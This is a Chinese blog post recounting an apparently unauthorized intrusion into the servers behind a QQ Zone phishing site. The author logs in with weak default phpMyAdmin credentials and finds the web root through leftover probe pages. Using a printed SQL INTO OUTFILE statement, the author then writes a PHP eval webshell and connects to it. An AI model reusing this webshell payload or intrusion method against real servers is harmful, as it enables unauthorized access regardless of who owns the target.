前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >渗透实战之QQ空间钓鱼网站

渗透实战之QQ空间钓鱼网站

作者头像
HACK学习
发布2020-01-14 15:22:12
5.9K0
发布2020-01-14 15:22:12
举报
文章被收录于专栏:HACK学习HACK学习

0x00 前言

打开邮箱,发现垃圾箱里躺着一封垃圾邮件

一看就是钓鱼邮件,话不多说,搞他。

没什么技术含量,看看就好。

0x01 渗透过程

第一部分

直接打开链接

除了登陆可以点击,其他超链接都是假的,也太不敬业了。

然后发现地址栏域名和垃圾邮箱里面的给的链接的域名不一样, 是跳转过去的,遂访问初始的域名。

打开一看,phpStudy 探针 2014 页面。

phpstudy 探针 可以测试 数据库连接,试试看弱口令,phpstudy数据库默认账号密码root 测试成功。

然后尝试登陆phpmyadmin

直接访问url+/phpMyAdmin/,使用测试成功的弱口令登陆。

数据库里面没什么东西,因为在探针页面知道了物理路径,所有直接写一句话木马,连接之。

select '<?php @eval($_POST[pass]);?>' into outfile 'D:/phpstudy/WWW/test.php';

这个服务器里面啥都没有,只有几个用来跳转连接的php文件, 就回到开头,继续搞qq钓鱼网站的。

第二部分

QQ钓鱼站的后台,找了一圈没找到。

访问一个不存在的文件,提示页面如下图 发现是用UPUPW搭建的,猜测会不会也有phpmyadmin

尝试访问url+/phpMyAdmin/ ,返回 404

又尝试访问url+/pmd/,成了

尝试弱口令成功登陆

准备写入一句话木马,不知道物理路径。 使用语句

select @@basedir

然后尝试在upupw默认网站路径下写入木马 提示:(Errcode: 2 "No such file or directory") 写入失败,文件夹不存在

然后又尝试了其他路径名,均以失败告终 一筹莫展之际, 想到upupw会不会也有探针页面,会不会没删? 百度之,upupw默认的探针页面是u.php, 尝试访问

得到网站物理路径,然后又是愉快的上蚁剑马连接了。

作者:dylan作者博客:dylan‘s blog
本文由公众号HACK学习排版编辑整理
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-12-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 HACK学习呀 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 前言
  • 0x01 渗透过程
    • 第一部分
      • 第二部分
      相关产品与服务
      数据库
      云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档